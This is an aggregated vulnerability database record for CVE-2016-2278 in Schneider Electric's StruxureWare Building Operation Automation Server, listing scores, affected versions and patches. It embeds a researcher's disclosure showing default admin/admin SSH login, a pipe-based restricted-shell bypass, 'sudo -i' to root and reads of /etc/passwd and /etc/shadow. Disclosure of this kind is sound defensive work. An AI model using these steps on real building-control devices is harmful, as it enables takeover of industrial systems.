ID

VAR-201603-0043


CVE

CVE-2016-2278


TITLE

Schneider Electric Building Operation Application Server Operating system command injection vulnerability

Trust: 0.8

sources: IVD: 5f237420-2351-11e6-abef-000c29c66e3d // CNVD: CNVD-2016-01450

DESCRIPTION

Schneider Electric Struxureware Building Operations Automation Server AS 1.7 and earlier and AS-P 1.7 and earlier allows remote authenticated administrators to execute arbitrary OS commands by defeating an msh (aka Minimal Shell) protection mechanism. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. A remote attacker can exploit this vulnerability to bypass access control and execute arbitrary OS commands. Weak credential management* *CVE-ID:* None *[ Mitre, CVE? ]* There are two primary users: a. root - password is not set by default - this is a problem as we will see later in the vuln findings - By default, root cannot SSH in. b. admin - default password is 'admin' - Anyone can remotely ssh in to the device using default admin/admin login. The system / application allows a) weak creds to start with, and more importantly, b) vulnerable versions lacks the mechanism to forcefully have the user change the initial password on first use or later. This has been fixed in the latest version. *2. OS Command Injection* After logging in to the device over SSH, the 'admin' user - the only active, administrative user at this point - is provided a restricted shell (msh), which offers a small set of, application- specific functional options. $ ssh <IP> -l admin Password: Welcome! (use 'help' to list commands) admin@box:> admin@box:> release NAME=SE2Linux ID=se2linux PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux) VERSION_ID=0.2.0.212 admin@box:> admin@box:> help usage: help [command] Type 'help [command]' for help on a specific command. Available commands: exit - exit this session ps - report a snapshot of the current processes readlog - read log files reboot - reboot the system setip - configure the network interface setlog - configure the logging setsnmp - configure the snmp service setsecurity - configure the security settime - configure the system time top - display Linux tasks uptime - tell how long the system has been running release - tell the os release details Attempting to run any different command will give an error message. However, this restricted shell functionality (msh) can be bypassed to execute underlying system commands, by appending '| <command>' to any of the above set of commands: admin@box:> uptime | ls bin home lost+found root sys config include mnt run tmp dev lib opt sbin usr etc localization proc share var admin@box:> uptime | cat /etc/passwd root:x:0:0:root:/:/bin/sh daemon:x:2:2:daemon:/sbin:/bin/false messagebus:x:3:3:messagebus:/sbin:/bin/false ntp:x:102:102:ntp:/var/empty/ntp:/bin/false sshd:x:103:103:sshd:/var/empty:/bin/false app:x:500:500:Linux Application:/:/bin/false admin:x:1000:1000:Linux User,,,:/:/bin/msh admin@box:> uptime | cat /etc/group root:x:0: wheel:x:1:admin daemon:x:2: messagebus:x:3: adm:x:5:admin power:x:20:app serial:x:21:app cio:x:22:app lon:x:23:app daemonsv:x:30:admin,app utmp:x:100: lock:x:101: ntp:x:102: sshd:x:103: app:x:500:admin admin:x:1000:admin *3. Privilege Escalation / access to root* *CVE-ID:* None *[ Mitre, CVE? ]* Since this is an administrative user, an attacker can exploit OS command injection to perform a variety of tasks from msh shell. But isn’t it better to get a root shell instead.! As observed from Issue 1 above, root does not have a password set, and it is possible to use 'sudo -i' and become root. Note: sudo is not presented / offered to 'admin' in the set of functional options available thru msh. admin@box:> *sudo -i* We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. Password: *root@box:~> *cat /etc/shadow root:!:16650:0:99999:7::: sshd:!:1:0:99999:7::: admin:$6$<hash>:16652:0:99999:7::: +++++ The Automation Server (AS) is one functional component of the larger, StruxureWare Building Operation platform (SBO) solution / environment. The AS password gets sync’d to SBO application rbac. With the new release, the default AS password will be forcefully changed, and msh has been sufficiently improved to mitigate against command injection. Issue 3, however, persists. Anyone with access to msh shell, can still drop in to root shell, and have some fun. +++++ -- Best Regards, Karn Ganeshen

Trust: 2.52

sources: NVD: CVE-2016-2278 // JVNDB: JVNDB-2016-001594 // CNVD: CNVD-2016-01450 // IVD: 5f237420-2351-11e6-abef-000c29c66e3d // VULHUB: VHN-91097 // PACKETSTORM: 136078

IOT TAXONOMY

category:['ICS']sub_category: -

Trust: 0.8

sources: IVD: 5f237420-2351-11e6-abef-000c29c66e3d // CNVD: CNVD-2016-01450

AFFECTED PRODUCTS

vendor:schneider electricmodel:struxureware building operations automation server asscope:lteversion:1.7

Trust: 1.8

vendor:schneider electricmodel:struxureware building operations automation server as-pscope:eqversion: -

Trust: 1.2

vendor:schneider electricmodel:struxureware building operations automation server as-pscope:eqversion:1.7

Trust: 1.0

vendor:schneider electricmodel:struxureware building operations automation server asscope: - version: -

Trust: 0.8

vendor:schneider electricmodel:struxureware building operations automation server as-pscope: - version: -

Trust: 0.8

vendor:schneider electricmodel:struxureware building operations automation server as-pscope:lteversion:1.7

Trust: 0.8

vendor:schneidermodel:electric struxureware building operation application serverscope:lteversion:<=1.7

Trust: 0.6

vendor:schneider electricmodel:struxureware building operations automation server asscope:eqversion: -

Trust: 0.6

vendor:schneider electricmodel:struxureware building operations automation server asscope:eqversion:1.7

Trust: 0.6

vendor:struxureware building operations automation server asmodel: - scope:eqversion:*

Trust: 0.2

vendor:struxureware building operations automation server as pmodel: - scope:eqversion:1.7

Trust: 0.2

sources: IVD: 5f237420-2351-11e6-abef-000c29c66e3d // CNVD: CNVD-2016-01450 // JVNDB: JVNDB-2016-001594 // CNNVD: CNNVD-201603-002 // NVD: CVE-2016-2278

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2016-2278
value: HIGH

Trust: 1.0

NVD: CVE-2016-2278
value: HIGH

Trust: 0.8

CNVD: CNVD-2016-01450
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201603-002
value: CRITICAL

Trust: 0.6

IVD: 5f237420-2351-11e6-abef-000c29c66e3d
value: CRITICAL

Trust: 0.2

VULHUB: VHN-91097
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2016-2278
severity: HIGH
baseScore: 9.0
vectorString: AV:N/AC:L/AU:S/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2016-01450
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

IVD: 5f237420-2351-11e6-abef-000c29c66e3d
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.9 [IVD]

Trust: 0.2

VULHUB: VHN-91097
severity: HIGH
baseScore: 9.0
vectorString: AV:N/AC:L/AU:S/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2016-2278
baseSeverity: HIGH
baseScore: 7.2
vectorString: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: HIGH
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 1.2
impactScore: 5.9
version: 3.0

Trust: 1.0

sources: IVD: 5f237420-2351-11e6-abef-000c29c66e3d // CNVD: CNVD-2016-01450 // VULHUB: VHN-91097 // JVNDB: JVNDB-2016-001594 // CNNVD: CNNVD-201603-002 // NVD: CVE-2016-2278

PROBLEMTYPE DATA

problemtype:CWE-284

Trust: 1.1

problemtype:CWE-Other

Trust: 0.8

sources: VULHUB: VHN-91097 // JVNDB: JVNDB-2016-001594 // NVD: CVE-2016-2278

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201603-002

TYPE

operating system commend injection

Trust: 0.6

sources: CNNVD: CNNVD-201603-002

CONFIGURATIONS

sources: JVNDB: JVNDB-2016-001594

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-91097

PATCH

title:SEVD-2016-025-01url:http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2016-025-01

Trust: 0.8

title:Schneider Electric Building Operation Application Server Operating System Command Injection Vulnerability Patchurl:https://www.cnvd.org.cn/patchInfo/show/72148

Trust: 0.6

title:Schneider Electric StruxureWare Building Operation Application Server Fixes for operating system command injection vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=60367

Trust: 0.6

sources: CNVD: CNVD-2016-01450 // JVNDB: JVNDB-2016-001594 // CNNVD: CNNVD-201603-002

EXTERNAL IDS

db:NVDid:CVE-2016-2278

Trust: 3.3

db:ICS CERTid:ICSA-16-061-01

Trust: 2.5

db:SCHNEIDERid:SEVD-2016-025-01

Trust: 1.8

db:EXPLOIT-DBid:39522

Trust: 1.1

db:CNNVDid:CNNVD-201603-002

Trust: 0.9

db:CNVDid:CNVD-2016-01450

Trust: 0.8

db:JVNDBid:JVNDB-2016-001594

Trust: 0.8

db:IVDid:5F237420-2351-11E6-ABEF-000C29C66E3D

Trust: 0.2

db:BIDid:83796

Trust: 0.1

db:VULHUBid:VHN-91097

Trust: 0.1

db:PACKETSTORMid:136078

Trust: 0.1

sources: IVD: 5f237420-2351-11e6-abef-000c29c66e3d // CNVD: CNVD-2016-01450 // VULHUB: VHN-91097 // JVNDB: JVNDB-2016-001594 // PACKETSTORM: 136078 // CNNVD: CNNVD-201603-002 // NVD: CVE-2016-2278

REFERENCES

url:https://ics-cert.us-cert.gov/advisories/icsa-16-061-01

Trust: 2.5

url:http://download.schneider-electric.com/files?p_doc_ref=sevd-2016-025-01

Trust: 1.7

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2278

Trust: 1.4

url:https://www.exploit-db.com/exploits/39522/

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2278

Trust: 0.8

url:http://oreo.schneider-electric.com/flipflop/1739415603/index.htm?p_endoctype=technical%20leaflet&p_reference=sevd-2016-025-01&p_file_name=sevd-2016-025-01%20sbo%20as.pdf&flipflop=1#/2

Trust: 0.1

sources: CNVD: CNVD-2016-01450 // VULHUB: VHN-91097 // JVNDB: JVNDB-2016-001594 // PACKETSTORM: 136078 // CNNVD: CNNVD-201603-002 // NVD: CVE-2016-2278

CREDITS

Karn Ganeshen

Trust: 0.1

sources: PACKETSTORM: 136078

SOURCES

db:IVDid:5f237420-2351-11e6-abef-000c29c66e3d
db:CNVDid:CNVD-2016-01450
db:VULHUBid:VHN-91097
db:JVNDBid:JVNDB-2016-001594
db:PACKETSTORMid:136078
db:CNNVDid:CNNVD-201603-002
db:NVDid:CVE-2016-2278

LAST UPDATE DATE

2025-04-13T23:18:00.921000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2016-01450date:2016-03-04T00:00:00
db:VULHUBid:VHN-91097date:2018-10-30T00:00:00
db:JVNDBid:JVNDB-2016-001594date:2016-03-07T00:00:00
db:CNNVDid:CNNVD-201603-002date:2016-03-03T00:00:00
db:NVDid:CVE-2016-2278date:2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:IVDid:5f237420-2351-11e6-abef-000c29c66e3ddate:2016-03-04T00:00:00
db:CNVDid:CNVD-2016-01450date:2016-03-04T00:00:00
db:VULHUBid:VHN-91097date:2016-03-02T00:00:00
db:JVNDBid:JVNDB-2016-001594date:2016-03-07T00:00:00
db:PACKETSTORMid:136078date:2016-03-04T00:41:39
db:CNNVDid:CNNVD-201603-002date:2016-03-02T00:00:00
db:NVDid:CVE-2016-2278date:2016-03-02T11:59:02.600